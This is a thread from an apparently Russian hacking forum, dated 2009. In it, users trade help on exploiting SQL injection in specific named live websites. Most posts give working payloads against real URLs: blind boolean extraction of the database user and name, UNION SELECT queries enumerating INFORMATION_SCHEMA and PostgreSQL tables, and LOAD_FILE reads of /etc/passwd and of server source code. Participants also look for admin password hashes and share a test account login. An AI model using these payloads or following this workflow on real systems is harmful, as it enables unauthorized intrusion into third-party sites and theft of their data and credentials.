RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 17:35:53.063333
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
Доступ на: 3 дня | 7 дней | 14 дней | Месяц
вот тут не фильрует
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 17:37:11.930000
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://wap.erwap.ru/help.php?b=r.php&v=3&co=ru&nn=2+and+1=1&lng=ru
тут такая ж картина, посмотри в низу номера
Стоимость отправки смс на номер 9099 составляет 5 у.е.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 17:51:55.196666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
http://wap.erwap.ru/index.php?nn=2-1&v=3&co=ru&lng=ru&f=photo/domashnee_foto/raznoe_4/006.jpg&i=1
вот ето глянь :)
В чем тут твоя ошибка. Ты пробуешь /index.php?nn=2-1 и видешь страницу /index.php?nn=1 и вроде бы так и должно быть при инъекции, однако…
Если ты попробуешь сделать /index.php?nn=4-1, то ты снова увидешь /index.php?nn=1, хотя должен увидеть /index.php?nn=3.
Тебя просто перекидывает на /index.php?nn=1.
quote:
http://wap.erwap.ru/help.php?b=r.php&v=3&co=ru&nn=2+and+1=1&lng=ru
тут такая ж картина, посмотри в низу номера
Стоимость отправки смс на номер 9099 составляет 5 у.е.
Запросы:
http://wap.erwap.ru/help.php?b=r.php&v=3&co=ru&nn=2+and+1=1&lng=ru
и
http://wap.erwap.ru/help.php?b=r.php&v=3&co=ru&nn=2+and+1=0&lng=ru
Должны выдавать разные результаты.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 18:00:50.153333
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
спасибо1!!
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 18:09:17.180000
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
c prowap.ru
——
09.02.2009 18:08:34, ger0in
скажи, у тебя 4 версия базы
09.02.2009 18:08:36, ger0in
?
09.02.2009 18:08:44, focs
нет
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 18:13:42.250000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
1. Возможно он и не понял, что ты у него спросил? Спроси конкретнее: "у тебя MYSQL версии 4.x.x?"
2. Из скули видно, что там 4-ая ветка.
3. Либо это фейк (что маловероятно), либо он врет, либо админ нуб и вообще не вкурсе о чем ты спрашиваешь.
Если у меня сайт перестанет лагать, то попробую раскрутить.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 18:22:12.426666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
не, он не нуб, он молчит, скажи что надо сделать с запросом - у меня не лагает, я попробую
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 18:42:32.890000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Не думаю, что я ошибся. И подзапросы работают:
http://biblio.prowap.ru/5.section.xhtml?letter=%D0%93'+or+ascii(substring((select+1+from+library_authors+limit+1),1,1))>'1
Осталось найти нужную таблу.
Как работать с блинд инъекцией можно почитать, например, тут.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 18:53:11.326666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
попробуй просто вытащить юзера и название БД и все, тогда все станет ясно:)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 18:59:14.606666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
user() - allowapr_portal@localhost
database() - allowapr_portal
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:01:11.416666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
что нить мона еще сделать?:)
—-
если все получиться, кинешь рублевый кашель в приват
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:02:27.340000
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
кинь те ссылки как ты вытащил юзер и название
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:08:28.843333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://biblio.prowap.ru/5.section.xhtml?letter=%D0%93'+or+ascii(substring(user(),1,1))='97
Первый символ user().
97 - это буква "a" в кодировке ascii.
http://biblio.prowap.ru/5.section.xhtml?letter=%D0%93'+or+ascii(substring(user(),2,1))='108
2 символ. 108 - буква "l"
И т.д.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:11:56.236666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
о_О и как ж ты так все по символьно подбирал? не трудно было ? или ты привык
——-
можн ли что то еще вытащить ? например хэш админа?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:13:29.113333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
о_О и как ж ты так все по символьно подбирал? не трудно было ? или ты привык
небольшая скрипт - и ничего трудного:)))
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:16:42.443333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
можн ли что то еще вытащить ? например хэш админа?
Проблема в том, что это 4-ая ветка. Таблиц user и users я там не застал.
Ну и ещё проблема, нереально долго ждать ответа от сайта )
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:20:59.796666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
а какой скрипт, он мне очень нужен
———
а как бы ватащить таблицы из 4 ?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:23:16.663333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: Isusik
а какой скрипт, он мне очень нужен
———
а как бы ватащить таблицы из 4 ?
1. Пишу пока, навороты нужны (или вот готовый и рабочий 100%, если разберешься - https://forum.antichat.ru/showpost.php?p=894169&postcount=5 )
2. Только брут
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:25:41.166666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://biblio.prowap.ru/5.section.xhtml?letter=%D0%93'+or+ascii(substring((select+1+from+таблица+limit+1),1,1))>'1
Если таблица будет верной, то увидешь туже страницу, что и http://biblio.prowap.ru/5.section.xhtml?letter=%D0%93. Если не верной, то другую или ошибку.
Вот пример:
http://biblio.prowap.ru/5.section.xhtml?letter=%D0%93'+or+ascii(substring((select+1+from+library_authors+limit+1),1,1))>'1
quote:
а какой скрипт, он мне очень нужен
Скрипты есть по ссылке, что я давал выше. И на античате есть (это не реклама^^).
Юзера и бд я вытащил без скриптов, вытащил через ошибки, а потом сравнил первые и последнии символы ^^
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:35:41.653333
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
Если таблица будет верной, то увидешь туже страницу, что и http://biblio.prowap.ru/5.section.xhtml?letter=%D0%93. Если не верной, то другую или ошибку.
оке, щас что то попробую нашевелить
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:38:05.596666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
а как скрипт заюзать? ну или ту программу что ты дал мне ?https://forum.antichat.ru/showpost.php?p=894169&postcount=5
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 19:45:54.100000
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
1. Пишу пока, навороты нужны (или вот готовый и рабочий 100%, если разберешься - https://forum.antichat.ru/showpost.php?p=894169&postcount=5 )
2. Только брут
——–
можешь скрипт под эту скулю настроить, что то ткрыл конфиг и не могу нечего понять
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 20:19:18.606666
|
|
|
Zergius
Сообщений: 2
Оценки: 0
Присоединился: 2007-12-24 21:03:14.300000
|
Такой вопрос: может ли бага отображаться только в IE Explorer? Когда захожу мазилой, ошибки не показывается, если оперой-то символ 1" меняется на 1%22…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 20:43:06.683333
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://wapos.ru/themes/?id=3838&s=2&wml=1-1
вот посомтрите,походу blind
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 20:52:59.223333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
quote:
Вопрос №1 Что это? (ну и далее линк , обычно с кавычкой на конце, пройдя по которому можно лицезреть ту или иную ошибку)
Этот вопрос порядком поднадоел и впринципе некорректен, но задаётся с завидной регулярностью
Если выводится ошибка, и в ней присутствует что то по базу/sql/mysql/mssql/PostgreSQL и т.д. или вываливается запрос, или функции вывода из базы, то это ошибка БД, и скорее всего будет возможность провести инъекцию.
НО. Инъекция , это внедрение своего кода в запрос и иногда как раз внедрить его не получится, несмотря на ошибку базы. Как нам это определить. Вот некоторые примеры, которые я надеюсь помогут, и избавят от этого вопроса
site.com/index.php?id=1
Выводит страницу 1
site.com/index.php?id=2-1(Выводит страницу 1)
site.com/index.php?id=2(Выводит страницу 2)
——————-
site.com/index.php?id=1*1(Выводит страницу 1)
site.com/index.php?id=1*2(Выводит страницу 2)
——————-
site.com/index.php?id=1+and+1=1(Выводит страницу 1)
site.com/index.php?id=1+and+1=2(Выводит ошибку, или ничего не выводит, вобщем отличается от первого)
——————-
Если эти примеры работают, то мы имеем SQL инъекцию.
https://forum.antichat.ru/thread104591.html
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 21:01:51.050000
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
r1dex я все перепробывал с провапом, вообще не чего не могу подобрать :(
——-
с вапосом нечего там?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 21:29:26.656666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://s1.dreamwar.ru/world/world.php?loc=2206-1&UIN=641539&pass=MTIzYWE%3D&sid=761f2ac7a5883625f5d2e6fcc1c73e46&rand=110212
тест акк : geroin 123123
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 21:48:15.030000
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
дайте бенчмарк на провап плиз, что то не конает по обычномум
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-09 22:40:28.226666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://chat.bodr.net/ins/919865/1243123/2/-2/288
акка нету свободного…..не сочтите за труд регнуться
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-10 15:10:29.473333
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://wab.ru/news.php?newsId=24533-1
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-10 18:51:48.483333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
подскажите что это кто знает http://dom-zdorovja.ru/doc.php?id=1
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-10 19:03:24.546666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
_http://dom-zdorovja.ru/product.php?id=-1+union+select+1,2,user(),database(),5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
помогите найти юзверей
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-11 21:09:53.570000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.kiis.com.ua/?id=2&sp=-1+union+select+1,2,3,4,COLUMN_NAME,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMNS
подскажите как прочитать содержимое
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-11 21:23:56.773333
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
where table_name='имятаблицы'
ыыы читай офф сайт mysql
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-12 00:42:39.923333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
FriLL, пробовал - не катит… выдаёт ошибку….. и так на все таблы….
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-12 00:52:33.986666
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Зашифруй таблицу в хек или чар. Без кавычек.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-12 09:43:58.106666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
спс
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-12 21:48:58.980000
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://wab.ru/news.php?newsId=24533-1
вот попробывал извлеч инфу - не вышло, походу фильтр
там даже бенчмарк не идет….
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-12 22:32:05.780000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
И не удивительно, это не MYSQL.
http://wab.ru/news.php?newsId=24532+and+1=0+union+select+null,null,TABLENAME,null,null,null,null,null+from+PG_TABLES+limit+1+offset+1--
PostgreSQL
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-02-13 01:44:03.336666
|
|
|
s405
Сообщений: 2
Оценки: 0
Присоединился: 2009-02-13 01:16:04.690000
|
Обнаружил уязвимость:
http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+–
С помощью LOAD_FILE смог получить содержимое /etc/passwd, но это меня не интересует.
Смог получить содержимое index.php: (нужно смотреть html-код получаемой страницы)
Его полный путь на сервере: /home/constant/constant-www/index.php
http://www.constant.ru/index.php?itemMenu=curorts&idcountry=5+union+select+1,2,LOAD_FILE(char(47,104,111,109,101,47,99,111,110,115,116,97,110,116,47,99,111,110,115,116,97,110,116,45,119,119,119,47,105,110,100,101,120,46,112,104,112)),4,5,6,7,8,9,10,11,12,13,14+from+countries+–
К сожелению можно читать не весь файл, а только начальный кусочек, 10 строк примерно.
Есть админка:
http://www.constant.ru/admin/
но не смог подобрать имя таблицы к ней. Точно знаю, что логин и пароль хранятся в базе данных, а не непосредственно в php-файле. Это я определил по начальным строкам файла http://www.constant.ru/admin/index.php3 который также я просмотрел с помощью LOAD_FILE.
Что еще можно сделать?
|
|
|
|
|
|
